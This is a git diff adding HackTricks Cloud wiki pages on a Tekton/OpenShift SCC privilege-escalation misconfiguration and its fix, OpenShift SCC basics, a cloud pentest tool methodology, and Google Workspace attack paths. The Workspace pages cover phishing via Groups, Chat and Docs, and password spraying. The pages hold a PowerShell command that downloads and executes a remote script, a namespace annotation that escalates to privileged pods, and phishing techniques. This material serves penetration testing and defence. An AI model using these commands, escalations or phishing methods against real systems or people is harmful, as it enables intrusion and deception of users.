+**The original author of this page is** [**Haroun**](https://www.linkedin.com/in/haroun-al-mounayar-571830211)
+
+### What is tekton
+
+According to the doc: _Tekton is a powerful and flexible open-source framework for creating CI/CD systems, allowing developers to build, test, and deploy across cloud providers and on-premise systems._ Both Jenkins and Tekton can be used to test, build and deploy applications, however Tekton is Cloud Native.&#x20;
+
+With Tekton everything is represented by YAML files. Developers can create Custom Resources (CR) of type `Pipelines` and specify multiple `Tasks` in them that they want to run. To run a Pipeline resources of type `PipelineRun` must be created.
+
+When tekton is installed a service account (sa) called pipeline is created in every namespace. When a Pipeline is ran, a pod will be spawned using this sa called `pipeline` to run the tasks defined in the YAML file.
+
+{% embed url="https://tekton.dev/docs/getting-started/pipelines/" %}
+Tekton Doc about Pipelines
+{% endembed %}
+
+### The Pipeline service account capabilities
+
+By default, the pipeline service account can use the `pipelines-scc` capability. This is due to the global default configuration of tekton. Actually, the global config of tekton is also a YAML in an openshift object called `TektonConfig` that can be seen if you have some reader roles in the cluster.
+
+```yaml
+apiVersion: operator.tekton.dev/v1alpha1
+kind: TektonConfig
+metadata:
+  name: config
+spec:
+  ...
+  ...
+  platforms:
+    openshift:
+      scc:
+        default: "pipelines-scc"
+```
+
+In any namespace, if you can get the pipeline service account token you will be able to use `pipelines-scc`.
+
+### The Misconfig
+
+The problem is that the default scc that the pipeline sa can use is user controllable. This can be done using a label in the namespace definition. For instance, if I can create a namespace with the following yaml definition:
+
+```yaml
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: test-namespace
+  annotations:
+    operator.tekton.dev/scc: privileged
+```
+
+The tekton operator will give to the pipeline service account in `test-namespace` the ability to use the scc privileged. This will allow the mounting of the node.
+
+### The fix
+
+Tekton documents about how to restrict the override of scc by adding a label in the `TektonConfig` object.
+
+{% embed url="https://tekton.dev/docs/operator/sccconfig/" %}
+Tekton doc about scc
+{% endembed %}
+
+This label is called `max-allowed`&#x20;
+
+```yaml
+apiVersion: operator.tekton.dev/v1alpha1
+kind: TektonConfig
+metadata:
+  name: config
+spec:
+  ...
+  ...
+  platforms:
+    openshift:
+      scc:
+        default: "restricted-v2"
+        maxAllowed: "privileged"
+```
diff --git a/pentesting-cloud/openshift-pentesting/openshift-scc.md b/pentesting-cloud/openshift-pentesting/openshift-scc.md
new file mode 100644
index 0000000000..68dae698de
--- /dev/null
+++ b/pentesting-cloud/openshift-pentesting/openshift-scc.md
@@ -0,0 +1,68 @@
+# Openshift - SCC
+
+**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
+
+## Definition
+
+In the context of OpenShift, SCC stands for **Security Context Constraints**. Security Context Constraints are policies that control permissions for pods running on OpenShift clusters. They define the security parameters under which a pod is allowed to run, including what actions it can perform and what resources it can access.
+
+SCCs help administrators enforce security policies across the cluster, ensuring that pods are running with appropriate permissions and adhering to organizational security standards. These constraints can specify various aspects of pod security, such as:
+
+1. Linux capabilities: Limiting the capabilities available to containers, such as the ability to perform privileged actions.
+2. SELinux context: Enforcing SELinux contexts for containers, which define how processes interact with resources on the system.
+3. Read-only root filesystem: Preventing containers from modifying files in certain directories.
+4. Allowed host directories and volumes: Specifying which host directories and volumes a pod can mount.
+5. Run as UID/GID: Specifying the user and group IDs under which the container process runs.
+6. Network policies: Controlling network access for pods, such as restricting egress traffic.
+
+By configuring SCCs, administrators can ensure that pods are running with the appropriate level of security isolation and access controls, reducing the risk of security vulnerabilities or unauthorized access within the cluster.
+
+Basically, every time a pod deployment is requested, an admission process is executed as the following:
+
+<figure><img src="../../.gitbook/assets/Managing SCCs in OpenShift-1.png" alt=""><figcaption></figcaption></figure>
+
+This additional security layer by default prohibits the creation of privileged pods, mounting of the host file system, or setting any attributes that could lead to privilege escalation.
+
+{% content-ref url="../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md" %}
+[pod-escape-privileges.md](../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md)
+{% endcontent-ref %}
+
+## List SCC
+
+To list all the SCC with the Openshift Client :
+
+```bash
+$ oc get scc #List all the SCCs
+
+$ oc auth can-i --list | grep securitycontextconstraints #Which scc user can use
+
+$ oc describe scc $SCC #Check SCC definitions
+```
+
+All users have access the default SCC "**restricted**" and "**restricted-v2**" which are the strictest SCCs.
+
+## Use SCC
+
+The SCC used for a pod is defined inside an annotation :
+
+```bash
+$ oc get pod MYPOD -o yaml | grep scc
+  openshift.io/scc: privileged
+```
+
+When a user has access to multiple SCCs, the system will utilize the one that aligns with the security context values. Otherwise, it will trigger a forbidden error.
+
+```bash
+$ oc apply -f evilpod.yaml #Deploy a privileged pod
+  Error from server (Forbidden): error when creating "evilpod.yaml": pods "evilpod" is forbidden: unable to validate against any security context constrain
+```
+
+## SCC Bypass
+
+{% content-ref url="openshift-privilege-escalation/openshift-scc-bypass.md" %}
+[openshift-scc-bypass.md](openshift-privilege-escalation/openshift-scc-bypass.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://www.redhat.com/en/blog/managing-sccs-in-openshift](https://www.redhat.com/en/blog/managing-sccs-in-openshift)
diff --git a/pentesting-cloud/pentesting-cloud-methodology.md b/pentesting-cloud/pentesting-cloud-methodology.md
new file mode 100644
index 0000000000..6e7039d1c6
--- /dev/null
+++ b/pentesting-cloud/pentesting-cloud-methodology.md
@@ -0,0 +1,457 @@
+# Pentesting Cloud Methodology
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+<figure><img src="../.gitbook/assets/CLOUD-logo-letters.svg" alt=""><figcaption></figcaption></figure>
+
+## Basic Methodology
+
+Each cloud has its own peculiarities but in general there are a few **common things a pentester should check** when testing a cloud environment:
+
+* **Benchmark checks**
+  * This will help you **understand the size** of the environment and **services used**
+  * It will allow you also to find some **quick misconfigurations** as you can perform most of this tests with **automated tools**
+* **Services Enumeration**
+  * You probably won't find much more misconfigurations here if you performed correctly the benchmark tests, but you might find some that weren't being looked for in the benchmark test.
+  * This will allow you to know **what is exactly being used** in the cloud env
+  * This will help a lot in the next steps
+* **Check exposed assets**
+  * This can be done during the previous section, you need to **find out everything that is potentially exposed** to the Internet somehow and how can it be accessed.
+    * Here I'm taking **manually exposed infrastructure** like instances with web pages or other ports being exposed, and also about other **cloud managed services that can be configured** to be exposed (such as DBs or buckets)
+  * Then you should check **if that resource can be exposed or not** (confidential information? vulnerabilities? misconfigurations in the exposed service?)
+* **Check permissions**
+  * Here you should **find out all the permissions of each role/user** inside the cloud and how are they used
+    * Too **many highly privileged** (control everything) accounts? Generated keys not used?... Most of these check should have been done in the benchmark tests already
+    * If the client is using OpenID or SAML or other **federation** you might need to ask them for further **information** about **how is being each role assigned** (it's not the same that the admin role is assigned to 1 user or to 100)
+  * It's **not enough to find** which users has **admin** permissions "\*:\*". There are a lot of **other permissions** that depending on the services used can be very **sensitive**.
+    * Moreover, there are **potential privesc** ways to follow abusing permissions. All this things should be taken into account and **as much privesc paths as possible** should be reported.
+* **Check Integrations**
+  * It's highly probably that **integrations with other clouds or SaaS** are being used inside the cloud env.
+    * For **integrations of the cloud you are auditing** with other platform you should notify **who has access to (ab)use that integration** and you should ask **how sensitive** is the action being performed.\
+      For example, who can write in an AWS bucket where GCP is getting data from (ask how sensitive is the action in GCP treating that data).
+    * For **integrations inside the cloud you are auditing** from external platforms, you should ask **who has access externally to (ab)use that integration** and check how is that data being used.\
+      For example, if a service is using a Docker image hosted in GCR, you should ask who has access to modify that and which sensitive info and access will get that image when executed inside an AWS cloud.
+
+## Multi-Cloud tools
+
+There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section.
+
+### [PurplePanda](https://github.com/carlospolop/purplepanda)
+
+A tool to **identify bad configurations and privesc path in clouds and across clouds/SaaS.**
+
+{% tabs %}
+{% tab title="Install" %}
+```bash
+# You need to install and run neo4j also
+git clone https://github.com/carlospolop/PurplePanda
+cd PurplePanda
+python3 -m venv .
+source bin/activate
+python3 -m pip install -r requirements.txt
+export PURPLEPANDA_NEO4J_URL="bolt://neo4j@localhost:7687"
+export PURPLEPANDA_PWD="neo4j_pwd_4_purplepanda"
+python3 main.py -h # Get help
+```
+{% endtab %}
+
+{% tab title="GCP" %}
+```bash
+export GOOGLE_DISCOVERY=$(echo 'google:
+- file_path: ""
+
+- file_path: ""
+  service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64)
+
+python3 main.py -a -p google #Get basic info of the account to check it's correctly configured
+python3 main.py -e -p google #Enumerate the env
+```
+{% endtab %}
+{% endtabs %}
+
+### [Prowler](https://github.com/prowler-cloud/prowler)
+
+It supports **AWS, GCP & Azure**. Check how to configure each provider in [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws)
+
+```bash
+# Install
+pip install prowler
+prowler -v
+
+# Run
+prowler <provider>
+# Example
+prowler aws --profile custom-profile [-M csv json json-asff html]
+
+# Get info about checks & services
+prowler <provider> --list-checks
+prowler <provider> --list-services
+```
+
+### [CloudSploit](https://github.com/aquasecurity/cloudsploit)
+
+AWS, Azure, Github, Google, Oracle, Alibaba
+
+{% tabs %}
+{% tab title="Install" %}
+```bash
+# Install
+git clone https://github.com/aquasecurity/cloudsploit.git
+cd cloudsploit
+npm install
+./index.js -h
+## Docker instructions in github
+```
+{% endtab %}
+
+{% tab title="GCP" %}
+```bash
+## You need to have creds for a service account and set them in config.js file
+./index.js --cloud google --config </abs/path/to/config.js>
+```
+{% endtab %}
+{% endtabs %}
+
+### [ScoutSuite](https://github.com/nccgroup/ScoutSuite)
+
+AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
+
+{% tabs %}
+{% tab title="Install" %}
+```bash
+mkdir scout; cd scout
+virtualenv -p python3 venv
+source venv/bin/activate
+pip install scoutsuite
+scout --help
+## Using Docker: https://github.com/nccgroup/ScoutSuite/wiki/Docker-Image
+```
+{% endtab %}
+
+{% tab title="GCP" %}
+```bash
+scout gcp --report-dir /tmp/gcp --user-account --all-projects
+## use "--service-account KEY_FILE" instead of "--user-account" to use a service account
+
+SCOUT_FOLDER_REPORT="/tmp"
+for pid in $(gcloud projects list --format="value(projectId)"); do
+    echo "================================================"
+    echo "Checking $pid"
+    mkdir "$SCOUT_FOLDER_REPORT/$pid"
+    scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid"
+done
+```
+{% endtab %}
+{% endtabs %}
+
+### [Steampipe](https://github.com/turbot)
+
+{% tabs %}
+{% tab title="Install" %}
+Download and install Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Or use Brew:
+
+```
+brew tap turbot/tap
+brew install steampipe
+```
+{% endtab %}
+
+{% tab title="GCP" %}
+```bash
+# Install gcp plugin
+steampipe plugin install gcp
+
+# Use https://github.com/turbot/steampipe-mod-gcp-compliance.git
+git clone https://github.com/turbot/steampipe-mod-gcp-compliance.git
+cd steampipe-mod-gcp-compliance
+# To run all the checks from the dashboard
+steampipe dashboard
+# To run all the checks from rhe cli
+steampipe check all
+```
+
+<details>
+
+<summary>Check all Projects</summary>
+
+In order to check all the projects you need to generate the `gcp.spc` file indicating all the projects to test. You can just follow the indications from the following script
+
+```bash
+FILEPATH="/tmp/gcp.spc"
+rm -rf "$FILEPATH" 2>/dev/null
+
+# Generate a json like object for each project
+for pid in $(gcloud projects list --format="value(projectId)"); do
+echo "connection \"gcp_$(echo -n $pid | tr "-" "_" )\" {
+    plugin  = \"gcp\"
+    project = \"$pid\"
+}" >> "$FILEPATH"
+done
+
+# Generate the aggragator to call
+echo 'connection "gcp_all" {
+  plugin      = "gcp" 
+  type        = "aggregator"
+  connections = ["gcp_*"]
+}' >> "$FILEPATH"
+
+echo "Copy $FILEPATH in ~/.steampipe/config/gcp.spc if it was correctly generated"
+```
+
+</details>
+
+To check **other GCP insights** (useful for enumerating services) use: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights)
+
+To check Terraform GCP code: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance)
+
+More GCP plugins of Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp)
+{% endtab %}
+
+{% tab title="AWS" %}
+```bash
+# Install aws plugin
+steampipe plugin install aws
+
+# Modify the spec indicating in "profile" the profile name to use
+nano ~/.steampipe/config/aws.spc
+
+# Get some info on how the AWS account is being used
+git clone https://github.com/turbot/steampipe-mod-aws-insights.git
+cd steampipe-mod-aws-insights
+steampipe dashboard
+
+# Get the services exposed to the internet
+git clone https://github.com/turbot/steampipe-mod-aws-perimeter.git
+cd steampipe-mod-aws-perimeter
+steampipe dashboard
+
+# Run the benchmarks
+git clone https://github.com/turbot/steampipe-mod-aws-compliance
+cd steampipe-mod-aws-compliance
+steampipe dashboard # To see results in browser
+steampipe check all --export=/tmp/output4.json
+```
+
+To check Terraform AWS code: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance)
+
+More AWS plugins of Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws)
+{% endtab %}
+{% endtabs %}
+
+### [~~cs-suite~~](https://github.com/SecurityFTW/cs-suite)
+
+AWS, GCP, Azure, DigitalOcean.\
+It requires python2.7 and looks unmaintained.
+
+### Nessus
+
+Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**.
+
+### [**cloudlist**](https://github.com/projectdiscovery/cloudlist)
+
+Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
+
+{% tabs %}
+{% tab title="Cloudlist" %}
+```bash
+cd /tmp
+wget https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip
+unzip cloudlist_1.0.1_macOS_arm64.zip
+chmod +x cloudlist
+sudo mv cloudlist /usr/local/bin
+```
+{% endtab %}
+
+{% tab title="Second Tab" %}
+```bash
+## For GCP it requires service account JSON credentials
+cloudlist -config </path/to/config>
+```
+{% endtab %}
+{% endtabs %}
+
+### [**cartography**](https://github.com/lyft/cartography)
+
+Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
+
+{% tabs %}
+{% tab title="Install" %}
+```bash
+# Installation
+docker image pull ghcr.io/lyft/cartography
+docker run --platform linux/amd64 ghcr.io/lyft/cartography cartography --help
+## Install a Neo4j DB version 3.5.*
+```
+{% endtab %}
+
+{% tab title="GCP" %}
+```bash
+docker run --platform linux/amd64 \
+     --volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \
+     -e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \
+     -e NEO4j_PASSWORD="s3cr3t" \
+     ghcr.io/lyft/cartography  \
+     --neo4j-uri bolt://host.docker.internal:7687 \
+     --neo4j-password-env-var NEO4j_PASSWORD \
+     --neo4j-user neo4j
+
+
+# It only checks for a few services inside GCP (https://lyft.github.io/cartography/modules/gcp/index.html)
+## Cloud Resource Manager
+## Compute
+## DNS
+## Storage
+## Google Kubernetes Engine
+### If you can run starbase or purplepanda you will get more info
+```
+{% endtab %}
+{% endtabs %}
+
+### [**starbase**](https://github.com/JupiterOne/starbase)
+
+Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
+
+{% tabs %}
+{% tab title="Install" %}
+```bash
+# You are going to need Node version 14, so install nvm following https://tecadmin.net/install-nvm-macos-with-homebrew/
+npm install --global yarn
+nvm install 14
+git clone https://github.com/JupiterOne/starbase.git
+cd starbase
+nvm use 14
+yarn install
+yarn starbase --help
+# Configure manually config.yaml depending on the env to analyze
+yarn starbase setup
+yarn starbase run
+
+# Docker
+git clone https://github.com/JupiterOne/starbase.git
+cd starbase
+cp config.yaml.example config.yaml
+# Configure manually config.yaml depending on the env to analyze
+docker build --no-cache -t starbase:latest .
+docker-compose run starbase setup
+docker-compose run starbase run
+```
+{% endtab %}
+
+{% tab title="GCP" %}
+```yaml
+## Config for GCP
+### Check out: https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md
+### It requires service account credentials
+ 
+integrations:
+  -
+    name: graph-google-cloud
+    instanceId: testInstanceId
+    directory: ./.integrations/graph-google-cloud
+    gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git
+    config:
+      SERVICE_ACCOUNT_KEY_FILE: '{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}'
+      PROJECT_ID: ""
+      FOLDER_ID: ""
+      ORGANIZATION_ID: ""
+      CONFIGURE_ORGANIZATION_PROJECTS: false
+
+storage:
+  engine: neo4j
+  config: 
+    username: neo4j
+    password: s3cr3t
+    uri: bolt://localhost:7687
+    #Consider using host.docker.internal if from docker
+```
+{% endtab %}
+{% endtabs %}
+
+### [**SkyArk**](https://github.com/cyberark/SkyArk)
+
+Discover the most privileged users in the scanned AWS or Azure environment, including the AWS Shadow Admins. It uses powershell.
+
+```powershell
+Import-Module .\SkyArk.ps1 -force
+Start-AzureStealth
+
+# in the Cloud Console
+IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')  
+Scan-AzureAdmins  
+```
+
+### [Cloud Brute](https://github.com/0xsha/CloudBrute)
+
+A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
+
+### [CloudFox](https://github.com/BishopFox/cloudfox)
+
+* CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming).
+* It is an enumeration tool which is intended to compliment manual pentesting.
+* It doesn't create or modify any data within the cloud environment.
+
+### More lists of cloud security tools
+
+* [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
+
+## Google
+
+### GCP
+
+{% content-ref url="gcp-security/" %}
+[gcp-security](gcp-security/)
+{% endcontent-ref %}
+
+### Workspace
+
+{% content-ref url="workspace-security/" %}
+[workspace-security](workspace-security/)
+{% endcontent-ref %}
+
+## AWS
+
+{% content-ref url="aws-security/" %}
+[aws-security](aws-security/)
+{% endcontent-ref %}
+
+## Azure
+
+{% content-ref url="azure-security/" %}
+[azure-security](azure-security/)
+{% endcontent-ref %}
+
+### Attack Graph
+
+[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.
+
+### Office365
+
+You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/workspace-security/README.md b/pentesting-cloud/workspace-security/README.md
new file mode 100644
index 0000000000..f974d179b6
--- /dev/null
+++ b/pentesting-cloud/workspace-security/README.md
@@ -0,0 +1,99 @@
+# GWS - Workspace Pentesting
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Entry Points
+
+### Google Platforms and OAuth Apps Phishing
+
+Check how you could use different Google platforms such as Drive, Chat, Groups... to send the victim a phishing link and how to perform a Google OAuth Phishing in:
+
+{% content-ref url="gws-google-platforms-phishing/" %}
+[gws-google-platforms-phishing](gws-google-platforms-phishing/)
+{% endcontent-ref %}
+
+### Password Spraying
+
+In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you could use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (although it looks unmaintained) which will use AWS lambdas to change IP address.
+
+## Post-Exploitation
+
+If you have compromised some credentials or the session of the user you can perform several actions to access potential sensitive information of the user and to try to escala privileges:
+
+{% content-ref url="gws-post-exploitation.md" %}
+[gws-post-exploitation.md](gws-post-exploitation.md)
+{% endcontent-ref %}
+
+### GWS <-->GCP Pivoting
+
+Read more about the different techniques to pivot between GWS and GCP in:
+
+{% content-ref url="../gcp-security/gcp-to-workspace-pivoting/" %}
+[gcp-to-workspace-pivoting](../gcp-security/gcp-to-workspace-pivoting/)
+{% endcontent-ref %}
+
+## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID)
+
+* **GCPW (Google Credential Provider for Windows)**: This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will **store tokens to access Google Workspace** in some places in the PC.
+* **GCDS (Google CLoud DIrectory Sync)**: This is a tool that can be used to **sync your active directory users and groups to your Workspace**. The tool requires the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
+* **Admin Directory Sync**: It allows you to synchronize users from AD and EntraID in a serverless process from [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
+
+{% content-ref url="gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/" %}
+[gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid](gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/)
+{% endcontent-ref %}
+
+## Persistence
+
+If you have compromised some credentials or the session of the user check these options to maintain persistence over it:
+
+{% content-ref url="gws-persistence.md" %}
+[gws-persistence.md](gws-persistence.md)
+{% endcontent-ref %}
+
+## Account Compromised Recovery
+
+* Log out of all sessions
+* Change user password
+* Generate new 2FA backup codes
+* Remove App passwords
+* Remove OAuth apps
+* Remove 2FA devices
+* Remove email forwarders
+* Remove emails filters
+* Remove recovery email/phones
+* Removed malicious synced smartphones
+* Remove bad Android Apps
+* Remove bad account delegations
+
+## References
+
+* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
+* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
new file mode 100644
index 0000000000..29201100ef
--- /dev/null
+++ b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
@@ -0,0 +1,194 @@
+# GWS - Google Platforms Phishing
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Generic Phishing Methodology
+
+{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology" %}
+
+## Google Groups Phishing
+
+Apparently, by default, in workspace members [**can create groups**](https://groups.google.com/all-groups) **and invite people to them**. You can then modify the email that will be sent to the user **adding some links.** The **email will come from a google address**, so it will look **legit** and people might click on the link.
+
+It's also possible to set the **FROM** address as the **Google group email** to send **more emails to the users inside the group**, like in the following image where the group **`google--support@googlegroups.com`** was created and an **email was sent to all the members** of the group (that were added without any consent)
+
+<figure><img src="../../../.gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
+
+## Google Chat Phishing
+
+You might be able to either **start a chat** with a person just having their email address or send an **invitation to talk**. Moreover, it's possible to **create a Space** that can have any name (e.g. "Google Support") and **invite** members to it. If they accept they might think that they are talking to Google Support:
+
+<figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="success" %}
+**In my testing however the invited members didn't even receive an invitation.**
+{% endhint %}
+
+You can check how this worked in the past in: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s)
+
+## Google Doc Phishing
+
+In the past it was possible to create an **apparently legitimate document** and the in a comment **mention some email (like @user@gmail.com)**. Google **sent an email to that email address** notifying that they were mentioned in the document.\
+Nowadays, this doesn't work but if you **give the victim email access to the document** Google will send an email indicating so. This is the message that appears when you mention someone:
+
+<figure><img src="../../../.gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="success" %}
+Victims might have protection mechanism that doesn't allow that emails indicating that an external document was shared with them reach their email.
+{% endhint %}
+
+## Google Calendar Phishing
+
